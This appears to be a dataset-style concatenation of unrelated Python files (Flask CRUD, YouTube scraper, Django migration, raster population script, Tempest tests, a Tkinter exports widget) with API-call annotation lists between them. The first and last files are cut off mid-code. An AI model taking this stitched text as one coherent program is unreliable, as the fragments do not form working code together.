    command.append(sys.argv[1])
    command.append(sys.argv[2])
    setNewCommand(command)
    # Wait briefly before reading back the response to the command.
    time.sleep(.3)
    print(readbackGet())
    readbackClear()
else:
    # Validation failed: append the invocation to an error log for debugging.
    # NOTE(review): sys.argv[3] is written unconditionally, but the header
    # documents only two arguments -- this raises IndexError when fewer than
    # four argv entries are present; confirm intent.
    f = open("/var/www/pixel/python/.error", "a")
    f.write(sys.argv[0] + '\n')
    f.write(sys.argv[1] + '\n')
    f.write(sys.argv[2] + '\n')
    f.write(sys.argv[3] + '\n')
    f.close()
| [
"time.sleep"
] | [((462, 477), 'time.sleep', 'time.sleep', (['(0.3)'], {}), '(0.3)\n', (472, 477), False, 'import time\n')] |
from getpass import getpass
from colorama import init, Fore, Back, Style
yes = ['Y', 'y', 'YES', 'yes', 'Yes']
class interface(object):
    """
    Terminal CLI

    Uniform, prefixed console messages ([*] info, [ERROR], [!] warning,
    [i] info banner) using colorama colors, plus password prompting.
    Methods taking get=True return the formatted string instead of printing.
    """
    def log(self, arg, get=False):
        """Print *arg* with the "[*]: " prefix, or return the formatted string when get=True."""
        if not get:
            print("[*]: {} ".format(arg))
        else:
            return "[*]: {} ".format(arg)
    def error(self, arg, get=False):
        """Report an error.

        Parameters
        ----------
        arg : str
            Message to report.
        get : bool
            If True, return the formatted string instead of printing.

        Returns
        -------
        str
            The formatted message, when get is True.

        Note: when get is False this prints in red and TERMINATES the
        process via exit(-1).
        """
        if not get:
            print(Fore.RED + "[ERROR]: {}".format(arg))
            print(Style.RESET_ALL)
            exit(-1)
        else:
            return "[ERROR]: {}".format(arg)
    def warning(self, arg, get=False):
        """Print *arg* as a yellow "[!]" warning, or return the plain string when get=True."""
        if not get:
            print(Fore.YELLOW + "[!]: {}".format(arg), end='')
            print(Style.RESET_ALL)
        else:
            return "[!]: {}".format(arg)
    def sure(self):
        """Ask for confirmation; return 0 on an affirmative answer, otherwise exit(0)."""
        user = input(self.log("Are you sure? (y/N) ", get=True))
        if user in yes:
            return 0
        else:
            exit(0)
    def newpasswd(self):
        """Prompt twice (no echo) until both entries match; return the new password."""
        condition = True
        while condition is True:
            user_psswd = getpass("[*]: Password:")
            user_psswd_repeat = getpass("[*]: Repeat password:")
            if user_psswd == user_psswd_repeat:
                condition = False
            else:
                self.warning("Passwords don't match! Try again")
        return user_psswd_repeat
    def passwd(self):
        """Prompt once for a password with no echo and return it."""
        return getpass()
    def info(self, arg):
        """Print *arg* as a black-on-white "[i]" informational banner."""
        print(Fore.BLACK + Back.WHITE + "[i]: {}".format(arg) + ' ', end='')
        print(Style.RESET_ALL)
| [
"getpass.getpass"
] | [((1690, 1699), 'getpass.getpass', 'getpass', ([], {}), '()\n', (1697, 1699), False, 'from getpass import getpass\n'), ((1361, 1386), 'getpass.getpass', 'getpass', (['"""[*]: Password:"""'], {}), "('[*]: Password:')\n", (1368, 1386), False, 'from getpass import getpass\n'), ((1419, 1451), 'getpass.getpass', 'getpass', (['"""[*]: Repeat password:"""'], {}), "('[*]: Repeat password:')\n", (1426, 1451), False, 'from getpass import getpass\n')] |
from app.models import Circuit, CircuitSchema, Provider
from flask import make_response, jsonify
from app import db
def read_all():
    """Respond to GET /circuits with every circuit on record.

    :return: list of serialized circuits
    """
    serializer = CircuitSchema(many=True)
    return serializer.dump(Circuit.query.all()).data
def read_one(circuit_id):
    """Respond to GET /circuits/<circuit_id> with one serialized circuit.

    Produces a 404 JSON error response when no circuit has that id.
    """
    match = Circuit.query.filter(Circuit.id == circuit_id).one_or_none()
    if not match:
        message = f'circuit not found for id {circuit_id}'
        return make_response(jsonify(error=404, message=message), 404)
    return CircuitSchema().dump(match).data
def create(circuit):
    """Create a circuit from the request payload.

    Rejects duplicates (provider_cid must be unique, -> 409) and unknown
    providers (-> 403); on success persists the circuit and returns the
    serialized record with a 201 status.

    :param circuit: dict with at least 'provider_cid' and 'provider_id'
    :return: (serialized circuit, 201) on success
    """
    provider_cid = circuit.get('provider_cid')
    provider_id = circuit.get('provider_id')
    circuit_exists = Circuit.query.filter(
        Circuit.provider_cid == provider_cid
    ).one_or_none()
    provider_exists = Provider.query.filter(Provider.id == provider_id).one_or_none()
    if circuit_exists:
        text = f'Circuit {provider_cid} already exists'
        return make_response(jsonify(error=409, message=text), 409)
    if not provider_exists:
        # BUG FIX: the two literals were implicitly concatenated with no
        # separating space, producing "...exist.Unable to create circuit".
        text = f'Provider {provider_id} does not exist. Unable to create circuit'
        return make_response(jsonify(error=403, message=text), 403)
    schema = CircuitSchema()
    new_circuit = schema.load(circuit, session=db.session).data
    db.session.add(new_circuit)
    db.session.commit()
    data = schema.dump(new_circuit).data
    return data, 201
def update(circuit_id, circuit):
    """Update an existing circuit.

    :param circuit_id: primary key of the circuit to update
    :param circuit: dict of fields to merge into the record
    :return: (serialized circuit, 201) on success; 404 JSON error otherwise
    """
    c = Circuit.query.filter_by(id=circuit_id).one_or_none()
    if not c:
        text = 'Can not update a circuit that does not exist!'
        # BUG FIX: the JSON body previously said error=409 while the HTTP
        # status was 404; make the payload agree with the response code.
        return make_response(jsonify(error=404, message=text), 404)
    schema = CircuitSchema()
    # Renamed from `update` -- the original local shadowed this function.
    updated = schema.load(circuit, session=db.session).data
    db.session.merge(updated)
    db.session.commit()
    return schema.dump(c).data, 201
| [
"app.db.session.commit",
"app.db.session.merge",
"app.models.Circuit.query.filter",
"app.models.Circuit.query.all",
"app.models.Provider.query.filter",
"app.db.session.add",
"app.models.Circuit.query.filter_by",
"app.models.CircuitSchema",
"flask.jsonify"
] | [((304, 323), 'app.models.Circuit.query.all', 'Circuit.query.all', ([], {}), '()\n', (321, 323), False, 'from app.models import Circuit, CircuitSchema, Provider\n'), ((337, 361), 'app.models.CircuitSchema', 'CircuitSchema', ([], {'many': '(True)'}), '(many=True)\n', (350, 361), False, 'from app.models import Circuit, CircuitSchema, Provider\n'), ((663, 678), 'app.models.CircuitSchema', 'CircuitSchema', ([], {}), '()\n', (676, 678), False, 'from app.models import Circuit, CircuitSchema, Provider\n'), ((1532, 1547), 'app.models.CircuitSchema', 'CircuitSchema', ([], {}), '()\n', (1545, 1547), False, 'from app.models import Circuit, CircuitSchema, Provider\n'), ((1617, 1644), 'app.db.session.add', 'db.session.add', (['new_circuit'], {}), '(new_circuit)\n', (1631, 1644), False, 'from app import db\n'), ((1649, 1668), 'app.db.session.commit', 'db.session.commit', ([], {}), '()\n', (1666, 1668), False, 'from app import db\n'), ((2056, 2071), 'app.models.CircuitSchema', 'CircuitSchema', ([], {}), '()\n', (2069, 2071), False, 'from app.models import Circuit, CircuitSchema, Provider\n'), ((2136, 2160), 'app.db.session.merge', 'db.session.merge', (['update'], {}), '(update)\n', (2152, 2160), False, 'from app import db\n'), ((2165, 2184), 'app.db.session.commit', 'db.session.commit', ([], {}), '()\n', (2182, 2184), False, 'from app import db\n'), ((443, 489), 'app.models.Circuit.query.filter', 'Circuit.query.filter', (['(Circuit.id == circuit_id)'], {}), '(Circuit.id == circuit_id)\n', (463, 489), False, 'from app.models import Circuit, CircuitSchema, Provider\n'), ((610, 642), 'flask.jsonify', 'jsonify', ([], {'error': '(404)', 'message': 'text'}), '(error=404, message=text)\n', (617, 642), False, 'from flask import make_response, jsonify\n'), ((1015, 1073), 'app.models.Circuit.query.filter', 'Circuit.query.filter', (['(Circuit.provider_cid == provider_cid)'], {}), '(Circuit.provider_cid == provider_cid)\n', (1035, 1073), False, 'from app.models import Circuit, 
CircuitSchema, Provider\n'), ((1125, 1174), 'app.models.Provider.query.filter', 'Provider.query.filter', (['(Provider.id == provider_id)'], {}), '(Provider.id == provider_id)\n', (1146, 1174), False, 'from app.models import Circuit, CircuitSchema, Provider\n'), ((1298, 1330), 'flask.jsonify', 'jsonify', ([], {'error': '(409)', 'message': 'text'}), '(error=409, message=text)\n', (1305, 1330), False, 'from flask import make_response, jsonify\n'), ((1479, 1511), 'flask.jsonify', 'jsonify', ([], {'error': '(403)', 'message': 'text'}), '(error=403, message=text)\n', (1486, 1511), False, 'from flask import make_response, jsonify\n'), ((1843, 1881), 'app.models.Circuit.query.filter_by', 'Circuit.query.filter_by', ([], {'id': 'circuit_id'}), '(id=circuit_id)\n', (1866, 1881), False, 'from app.models import Circuit, CircuitSchema, Provider\n'), ((2003, 2035), 'flask.jsonify', 'jsonify', ([], {'error': '(409)', 'message': 'text'}), '(error=409, message=text)\n', (2010, 2035), False, 'from flask import make_response, jsonify\n')] |
import asyncio
import json
import re
from collections import deque
from typing import Deque, Dict, List, Match, Pattern
import aiohttp
from .error import RateLimited
# Browser-like User-Agent sent with every request -- presumably so YouTube
# serves the standard desktop watch-page markup; confirm against current site.
headers: dict = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
}
# Captures the JSON object assigned to ytInitialData in the page source
# (group 1 is the raw JSON text).
DATA_JSON: Pattern = re.compile(
    r'(?:window\["ytInitialData"\]|ytInitialData)\W?=\W?({.*?});'
)
def fetch(vURL: str, local_addr: str = None) -> List[Dict]:
    """Synchronous wrapper around :func:`async_fetch`; runs its own event loop."""
    return asyncio.run(async_fetch(vURL, local_addr))
async def async_fetch(vURL: str, local_addr: str = None) -> List[Dict]:
    """Fetch a YouTube watch page and return its end-screen related videos.

    Each result item is a dict with "id", "title" and "duration"
    (duration is None when the page reports no length).

    Raises RateLimited on HTTP 429 and ValueError when the ytInitialData
    blob cannot be located in the page.
    """
    # Optionally bind the outgoing connection to a specific local address
    # (port 0 = any free ephemeral port).
    connector: aiohttp.TCPConnector = (
        aiohttp.TCPConnector(local_addr=(local_addr, 0)) if local_addr else None
    )
    async with aiohttp.ClientSession(connector=connector, headers=headers) as session:
        async with session.get(vURL) as response:
            if response.status == 429:
                raise RateLimited
            RAW: str = await response.text()
    Search: Match = DATA_JSON.search(RAW)
    if not Search:
        raise ValueError("Could not extract ytInitialData.")
    Data: Dict = json.loads(Search.group(1))
    # Walk down to the end-screen renderer that lists the related videos.
    Overlay: Dict = Data["playerOverlays"]["playerOverlayRenderer"]
    watchNextEndScreenRenderer: Dict = Overlay["endScreen"][
        "watchNextEndScreenRenderer"
    ]
    # Keep only entries that actually are video renderers and project each
    # one down to the three fields callers use.
    Result: list = [
        {
            "id": Item["videoId"],
            "title": Item["title"]["simpleText"],
            "duration": Item["lengthInSeconds"] if "lengthInSeconds" in Item else None,
        }
        for Item in [
            result["endScreenVideoRenderer"]
            for result in watchNextEndScreenRenderer["results"]
            if "endScreenVideoRenderer" in result
        ]
    ]
    return Result
class preventDuplication:
    """Wrapper over async_fetch that avoids repeating recent results.

    Remembers the ids of the last 10 videos handed out and skips them on
    later calls; once every fetched candidate has been seen, the memory is
    cleared and the first candidate is returned again.
    """
    def __init__(self):
        # Bounded buffer of the most recent video ids returned.
        self._LastRelated: Deque = deque(maxlen=10)
    def get(self, vURL: str, local_addr: str = None) -> Dict:
        """Synchronous wrapper around async_get; runs its own event loop."""
        return asyncio.run(self.async_get(vURL, local_addr))
    async def async_get(self, vURL: str, local_addr: str = None) -> Dict:
        """Return one related-video dict for vURL not handed out recently.

        NOTE(review): raises IndexError if async_fetch returns an empty
        list -- confirm callers guarantee at least one related video.
        """
        Data: List[Dict] = await async_fetch(vURL, local_addr)
        for Item in Data:
            if not Item["id"] in self._LastRelated:
                self._LastRelated.append(Item["id"])
                return Item
        # Every candidate was seen recently: reset and restart the cycle.
        self._LastRelated.clear()
        return Data[0]
| [
"aiohttp.ClientSession",
"aiohttp.TCPConnector",
"collections.deque",
"re.compile"
] | [((301, 377), 're.compile', 're.compile', (['"""(?:window\\\\["ytInitialData"\\\\]|ytInitialData)\\\\W?=\\\\W?({.*?});"""'], {}), '(\'(?:window\\\\["ytInitialData"\\\\]|ytInitialData)\\\\W?=\\\\W?({.*?});\')\n', (311, 377), False, 'import re\n'), ((619, 667), 'aiohttp.TCPConnector', 'aiohttp.TCPConnector', ([], {'local_addr': '(local_addr, 0)'}), '(local_addr=(local_addr, 0))\n', (639, 667), False, 'import aiohttp\n'), ((713, 772), 'aiohttp.ClientSession', 'aiohttp.ClientSession', ([], {'connector': 'connector', 'headers': 'headers'}), '(connector=connector, headers=headers)\n', (734, 772), False, 'import aiohttp\n'), ((1814, 1830), 'collections.deque', 'deque', ([], {'maxlen': '(10)'}), '(maxlen=10)\n', (1819, 1830), False, 'from collections import deque\n')] |
# Generated by Django 2.2.5 on 2019-09-24 09:11
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial migration: creates the Category, Request and RequestImage
    tables. Verbose names are Korean UI labels; field comments below note
    their meanings."""
    initial = True
    dependencies = [
    ]
    operations = [
        # Category: a named, scored classification with an optional image.
        migrations.CreateModel(
            name='Category',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=30, verbose_name='이름')),  # name
                ('score', models.PositiveIntegerField(default=0, verbose_name='점수')),  # score
                ('image', models.ImageField(blank=True, null=True, upload_to='category')),
            ],
        ),
        # Request: a help request with status workflow, location and timestamps.
        migrations.CreateModel(
            name='Request',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=100, verbose_name='제목')),  # title
                ('content', models.TextField(verbose_name='내용')),  # content
                # status workflow: start (help requested) -> progress -> complete
                ('status', models.CharField(blank=True, choices=[('start', '도움요청중'), ('progress', '진행중'), ('complete', '완료')], default='start', max_length=20, verbose_name='상태')),
                ('score', models.PositiveIntegerField(default=0, verbose_name='점수')),  # score
                ('main_address', models.CharField(blank=True, max_length=30, null=True, verbose_name='메인 주소')),  # main address
                ('detail_address', models.CharField(blank=True, max_length=50, null=True, verbose_name='상세 주소')),  # detail address
                ('latitude', models.FloatField(blank=True, null=True, verbose_name='위도')),
                ('longitude', models.FloatField(blank=True, null=True, verbose_name='경도')),
                ('occurred_at', models.DateField(blank=True, null=True, verbose_name='발생 시각')),  # occurrence time
                ('created_at', models.DateTimeField(auto_now_add=True, verbose_name='업로드 시각')),  # upload time
                ('updated_at', models.DateTimeField(auto_now=True, verbose_name='수정 시각')),  # modified time
            ],
        ),
        # RequestImage: images attached to a Request (cascade-deleted with it).
        migrations.CreateModel(
            name='RequestImage',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('image', models.ImageField(upload_to='request/%Y/%m/%d', verbose_name='이미지')),  # image
                ('request', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='images', to='request.Request', verbose_name='의뢰')),  # request
            ],
        ),
    ]
| [
"django.db.models.FloatField",
"django.db.models.DateField",
"django.db.models.TextField",
"django.db.models.ForeignKey",
"django.db.models.DateTimeField",
"django.db.models.AutoField",
"django.db.models.PositiveIntegerField",
"django.db.models.ImageField",
"django.db.models.CharField"
] | [((337, 430), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (353, 430), False, 'from django.db import migrations, models\n'), ((454, 504), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(30)', 'verbose_name': '"""이름"""'}), "(max_length=30, verbose_name='이름')\n", (470, 504), False, 'from django.db import migrations, models\n'), ((533, 590), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', ([], {'default': '(0)', 'verbose_name': '"""점수"""'}), "(default=0, verbose_name='점수')\n", (560, 590), False, 'from django.db import migrations, models\n'), ((619, 681), 'django.db.models.ImageField', 'models.ImageField', ([], {'blank': '(True)', 'null': '(True)', 'upload_to': '"""category"""'}), "(blank=True, null=True, upload_to='category')\n", (636, 681), False, 'from django.db import migrations, models\n'), ((814, 907), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (830, 907), False, 'from django.db import migrations, models\n'), ((932, 983), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)', 'verbose_name': '"""제목"""'}), "(max_length=100, verbose_name='제목')\n", (948, 983), False, 'from django.db import migrations, models\n'), ((1014, 1049), 'django.db.models.TextField', 'models.TextField', ([], {'verbose_name': '"""내용"""'}), "(verbose_name='내용')\n", (1030, 1049), False, 'from django.db import migrations, models\n'), ((1079, 1237), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'choices': "[('start', '도움요청중'), ('progress', '진행중'), ('complete', '완료')]", 'default': '"""start"""', 
'max_length': '(20)', 'verbose_name': '"""상태"""'}), "(blank=True, choices=[('start', '도움요청중'), ('progress',\n '진행중'), ('complete', '완료')], default='start', max_length=20,\n verbose_name='상태')\n", (1095, 1237), False, 'from django.db import migrations, models\n'), ((1258, 1315), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', ([], {'default': '(0)', 'verbose_name': '"""점수"""'}), "(default=0, verbose_name='점수')\n", (1285, 1315), False, 'from django.db import migrations, models\n'), ((1351, 1427), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(30)', 'null': '(True)', 'verbose_name': '"""메인 주소"""'}), "(blank=True, max_length=30, null=True, verbose_name='메인 주소')\n", (1367, 1427), False, 'from django.db import migrations, models\n'), ((1465, 1541), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(50)', 'null': '(True)', 'verbose_name': '"""상세 주소"""'}), "(blank=True, max_length=50, null=True, verbose_name='상세 주소')\n", (1481, 1541), False, 'from django.db import migrations, models\n'), ((1573, 1632), 'django.db.models.FloatField', 'models.FloatField', ([], {'blank': '(True)', 'null': '(True)', 'verbose_name': '"""위도"""'}), "(blank=True, null=True, verbose_name='위도')\n", (1590, 1632), False, 'from django.db import migrations, models\n'), ((1665, 1724), 'django.db.models.FloatField', 'models.FloatField', ([], {'blank': '(True)', 'null': '(True)', 'verbose_name': '"""경도"""'}), "(blank=True, null=True, verbose_name='경도')\n", (1682, 1724), False, 'from django.db import migrations, models\n'), ((1759, 1820), 'django.db.models.DateField', 'models.DateField', ([], {'blank': '(True)', 'null': '(True)', 'verbose_name': '"""발생 시각"""'}), "(blank=True, null=True, verbose_name='발생 시각')\n", (1775, 1820), False, 'from django.db import migrations, models\n'), ((1854, 1916), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)', 'verbose_name': 
'"""업로드 시각"""'}), "(auto_now_add=True, verbose_name='업로드 시각')\n", (1874, 1916), False, 'from django.db import migrations, models\n'), ((1950, 2007), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now': '(True)', 'verbose_name': '"""수정 시각"""'}), "(auto_now=True, verbose_name='수정 시각')\n", (1970, 2007), False, 'from django.db import migrations, models\n'), ((2145, 2238), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (2161, 2238), False, 'from django.db import migrations, models\n'), ((2263, 2330), 'django.db.models.ImageField', 'models.ImageField', ([], {'upload_to': '"""request/%Y/%m/%d"""', 'verbose_name': '"""이미지"""'}), "(upload_to='request/%Y/%m/%d', verbose_name='이미지')\n", (2280, 2330), False, 'from django.db import migrations, models\n'), ((2361, 2492), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'on_delete': 'django.db.models.deletion.CASCADE', 'related_name': '"""images"""', 'to': '"""request.Request"""', 'verbose_name': '"""의뢰"""'}), "(on_delete=django.db.models.deletion.CASCADE, related_name\n ='images', to='request.Request', verbose_name='의뢰')\n", (2378, 2492), False, 'from django.db import migrations, models\n')] |
#!/usr/bin/python3
from typing import Dict
import optparse
import numpy as np
import rasterio
from rasterio import features
def main(county_pop_file, spatial_dist_file, fname_out, no_data_val=-9999):
    '''
    county_pop_file: County level population estimates
    spatial_dist_file: Spatial projection of population distribution
    fname_out: Path of the raster written with the distributed estimates
    no_data_val: Fill value written to cells lacking data in either input
    '''
    # -------------------------------------
    # Open and read raster file with county
    # level population estimates
    # -------------------------------------
    with rasterio.open(county_pop_file) as rastf:
        county_pop = rastf.read()
        nodatacp = rastf.nodata
    # --------------------------------------------------------------
    # Open and read raster file with spatial population distribution
    # --------------------------------------------------------------
    with rasterio.open(spatial_dist_file) as rastf:
        pop_dist = rastf.read()
        nodatasp = rastf.nodata
        prf = rastf.profile
    # Drop singleton band axes so both grids are plain 2-D arrays.
    county_pop = np.squeeze(county_pop)
    pop_dist = np.squeeze(pop_dist)
    pop_est = np.ones(pop_dist.shape)*no_data_val
    # Only estimate population over cells that are valid in BOTH rasters.
    ind1 = np.where(county_pop.flatten() != nodatacp)[0]
    ind2 = np.where(pop_dist.flatten() != nodatasp)[0]
    ind = np.intersect1d(ind1, ind2)
    ind2d = np.unravel_index(ind, pop_dist.shape)
    # Per-cell estimate = county total weighted by the cell's share,
    # rounded to whole persons.
    pop_est[ind2d] = county_pop[ind2d] * pop_dist[ind2d]
    pop_est[ind2d] = np.round(pop_est[ind2d])
    # Update raster meta-data
    prf.update(nodata=no_data_val)
    # Write out spatially distributed population estimate to raster
    with open(fname_out, "wb") as fout:
        with rasterio.open(fout.name, 'w', **prf) as out_raster:
            out_raster.write(pop_est.astype(rasterio.float32), 1)
# Command-line driver: the three options are all required; missing ones
# print a hint and exit with status 1.
argparser = optparse.OptionParser()
argparser.add_option('--population-file', action='store', dest='pop_file',
                     help='County level population estimates')
argparser.add_option('--dist-file', action='store', dest='dist_file',
                     help='Spatial projection of population distribution')
argparser.add_option('--out-file', action='store', dest='out_file',
                     help='Filename of the output')

(options, args) = argparser.parse_args()

# BUG FIX: the original called sys.exit(1) without importing sys, raising
# NameError instead of exiting cleanly. raise SystemExit(1) needs no import
# and preserves the intended exit status.
if not options.pop_file:
    print('Please specify a population file with --population-file')
    raise SystemExit(1)
if not options.dist_file:
    print('Please specify a distribution file with --dist-file')
    raise SystemExit(1)
if not options.out_file:
    print('Please specify the name of the output with --out-file')
    raise SystemExit(1)

main(options.pop_file, options.dist_file, options.out_file)
| [
"numpy.intersect1d",
"numpy.ones",
"rasterio.open",
"optparse.OptionParser",
"numpy.squeeze",
"numpy.unravel_index",
"numpy.round"
] | [((1730, 1753), 'optparse.OptionParser', 'optparse.OptionParser', ([], {}), '()\n', (1751, 1753), False, 'import optparse\n'), ((996, 1018), 'numpy.squeeze', 'np.squeeze', (['county_pop'], {}), '(county_pop)\n', (1006, 1018), True, 'import numpy as np\n'), ((1034, 1054), 'numpy.squeeze', 'np.squeeze', (['pop_dist'], {}), '(pop_dist)\n', (1044, 1054), True, 'import numpy as np\n'), ((1229, 1255), 'numpy.intersect1d', 'np.intersect1d', (['ind1', 'ind2'], {}), '(ind1, ind2)\n', (1243, 1255), True, 'import numpy as np\n'), ((1268, 1305), 'numpy.unravel_index', 'np.unravel_index', (['ind', 'pop_dist.shape'], {}), '(ind, pop_dist.shape)\n', (1284, 1305), True, 'import numpy as np\n'), ((1385, 1409), 'numpy.round', 'np.round', (['pop_est[ind2d]'], {}), '(pop_est[ind2d])\n', (1393, 1409), True, 'import numpy as np\n'), ((519, 549), 'rasterio.open', 'rasterio.open', (['county_pop_file'], {}), '(county_pop_file)\n', (532, 549), False, 'import rasterio\n'), ((843, 875), 'rasterio.open', 'rasterio.open', (['spatial_dist_file'], {}), '(spatial_dist_file)\n', (856, 875), False, 'import rasterio\n'), ((1070, 1093), 'numpy.ones', 'np.ones', (['pop_dist.shape'], {}), '(pop_dist.shape)\n', (1077, 1093), True, 'import numpy as np\n'), ((1598, 1634), 'rasterio.open', 'rasterio.open', (['fout.name', '"""w"""'], {}), "(fout.name, 'w', **prf)\n", (1611, 1634), False, 'import rasterio\n')] |
import testtools
from oslo_log import log
from tempest.api.compute import base
import tempest.api.compute.flavors.test_flavors as FlavorsV2Test
import tempest.api.compute.flavors.test_flavors_negative as FlavorsListWithDetailsNegativeTest
import tempest.api.compute.flavors.test_flavors_negative as FlavorDetailsNegativeTest
from tempest.common.utils import data_utils
from tempest.lib import exceptions as lib_exc
from tempest.lib import decorators
from tempest import test
from tempest import config
CONF = config.CONF
LOG = log.getLogger(__name__)
class HybridFlavorsV2TestJSON(FlavorsV2Test.FlavorsV2TestJSON):
    """Test flavors: re-runs the upstream Tempest FlavorsV2TestJSON suite unchanged."""
# Skipped wholesale: the testscenarios-generated negative cases are disabled.
@testtools.skip("testscenarios are not active.")
@test.SimpleNegativeAutoTest
class HybridFlavorsListWithDetailsNegativeTestJSON(FlavorsListWithDetailsNegativeTest.FlavorsListWithDetailsNegativeTestJSON):
    """Test FlavorsListWithDetails"""
# Skipped wholesale: the testscenarios-generated negative cases are disabled.
@testtools.skip("testscenarios are not active.")
@test.SimpleNegativeAutoTest
class HybridFlavorDetailsNegativeTestJSON(FlavorDetailsNegativeTest.FlavorDetailsNegativeTestJSON):
    """Test FlavorDetails"""
| [
"testtools.skip",
"oslo_log.log.getLogger"
] | [((530, 553), 'oslo_log.log.getLogger', 'log.getLogger', (['__name__'], {}), '(__name__)\n', (543, 553), False, 'from oslo_log import log\n'), ((644, 691), 'testtools.skip', 'testtools.skip', (['"""testscenarios are not active."""'], {}), "('testscenarios are not active.')\n", (658, 691), False, 'import testtools\n'), ((888, 935), 'testtools.skip', 'testtools.skip', (['"""testscenarios are not active."""'], {}), "('testscenarios are not active.')\n", (902, 935), False, 'import testtools\n')] |
#!/usr/bin/env python3
"""
dycall.exports
~~~~~~~~~~~~~~
Contains `ExportsFrame` and `ExportsTreeView`.
"""
from __future__ import annotations
import logging
import pathlib
from typing import TYPE_CHECKING
import ttkbootstrap as tk
from ttkbootstrap import ttk
from ttkbootstrap.dialogs import Messagebox
from ttkbootstrap.localization import MessageCatalog as MsgCat
from ttkbootstrap.tableview import Tableview
from dycall._widgets import _TrLabelFrame
from dycall.types import Export, PEExport
from dycall.util import StaticThemedTooltip, get_img
log = logging.getLogger(__name__)
class ExportsFrame(_TrLabelFrame):
"""Contains **Exports** combobox and a button for `ExportsTreeView`.
Use command line argument `--exp` to select an export from the library on
launch. Combobox validates export name.
TODO: Combobox works like google search (auto-suggest, recents etc.)
"""
def __init__(
self,
root: tk.Window,
selected_export: tk.StringVar,
sort_order: tk.StringVar,
output: tk.StringVar,
status: tk.StringVar,
is_loaded: tk.BooleanVar,
is_native: tk.BooleanVar,
is_reinitialised: tk.BooleanVar,
lib_path: tk.StringVar,
exports: list[Export],
):
log.debug("Initalising")
super().__init__(text="Exports")
self.__root = root
self.__selected_export = selected_export
self.__sort_order = sort_order
self.__output = output
self.__status = status
self.__is_loaded = is_loaded
self.__is_native = is_native
self.__is_reinitialised = is_reinitialised
self.__lib_path = lib_path
self.__exports = exports
self.__export_names: list[str] = []
self.cb = ttk.Combobox(
self,
state="disabled",
textvariable=selected_export,
validate="focusout",
validatecommand=(self.register(self.cb_validate), "%P"),
)
# ! self.cb.bind("<Return>", lambda *_: self.cb_validate) # Doesn't work
self.cb.bind("<<ComboboxSelected>>", self.cb_selected)
self.__list_png = get_img("list.png")
self.lb = ttk.Label(self, image=self.__list_png)
self.lb.bind(
"<Enter>", lambda *_: StaticThemedTooltip(self.lb, "List of exports")
)
self.lb.bind(
"<ButtonRelease-1>", lambda *_: status.set("Load a library first!")
)
self.lb.pack(padx=(0, 5), pady=5, side="right")
self.cb.pack(fill="x", padx=5, pady=5)
self.bind_all("<<PopulateExports>>", lambda *_: self.set_cb_values())
self.bind_all(
"<<ToggleExportsFrame>>", lambda event: self.set_state(event.state == 1)
)
self.bind_all("<<SortExports>>", lambda *_: self.sort())
log.debug("Initialised")
def cb_selected(self, *_):
"""Callback to handle clicks on **Exports** combobox.
Resets **Output** and activates/deactivates `FunctionFrame`.
"""
log.debug("%s selected", self.__selected_export.get())
self.__output.set("")
if self.__is_native.get():
self.__root.event_generate("<<ToggleFunctionFrame>>", state=1)
else:
self.__root.event_generate("<<ToggleFunctionFrame>>", state=0)
def cb_validate(self, *_) -> bool:
"""Callback to handle keyboard events on **Exports** combobox.
Activates `FunctionFrame` when the text in the combobox
is a valid export name. Deactivates it otherwise.
"""
log.debug("Validating Exports combobox")
try:
# Don't validate if combobox dropdown arrow was pressed
self.cb.state()[1] == "pressed"
except IndexError:
exp = self.cb.get()
if exp:
if exp in self.__export_names:
self.cb_selected()
return True
self.__root.event_generate("<<ToggleFunctionFrame>>", state=1)
return False
return True
def set_state(self, activate: bool = True):
"""Activates/deactivates **Exports** combobox.
Args:
activate (bool, optional): Activated when True, deactivated when
False. Defaults to True.
"""
log.debug("Called with activate=%s", activate)
state = "normal" if activate else "disabled"
self.cb.configure(state=state)
def set_cb_values(self):
"""Demangles and sets the export names to the **Exports** combobox."""
exports = self.__exports
if not self.__is_reinitialised.get() or self.__is_loaded.get():
num_exports = len(exports)
log.info("Found %d exports", num_exports)
self.__status.set(f"{num_exports} exports found")
failed = []
for exp in exports:
if isinstance(exp, PEExport):
if hasattr(exp, "exc"):
failed.append(exp.name)
if failed:
Messagebox.show_warning(
f"These export names couldn't be demangled: {failed}",
"Demangle Errors",
parent=self.__root,
)
self.__export_names = names = list(e.demangled_name for e in exports)
self.set_state()
self.cb.configure(values=names)
selected_export = self.__selected_export.get()
if selected_export:
if selected_export not in names:
err = "%s not found in export names"
log.error(err, selected_export)
Messagebox.show_error(
err % selected_export, "Export not found", parent=self.__root
)
self.cb.set("")
else:
# Activate function frame when export name is passed from command line
self.cb_selected()
self.lb.configure(cursor="hand2")
self.lb.bind(
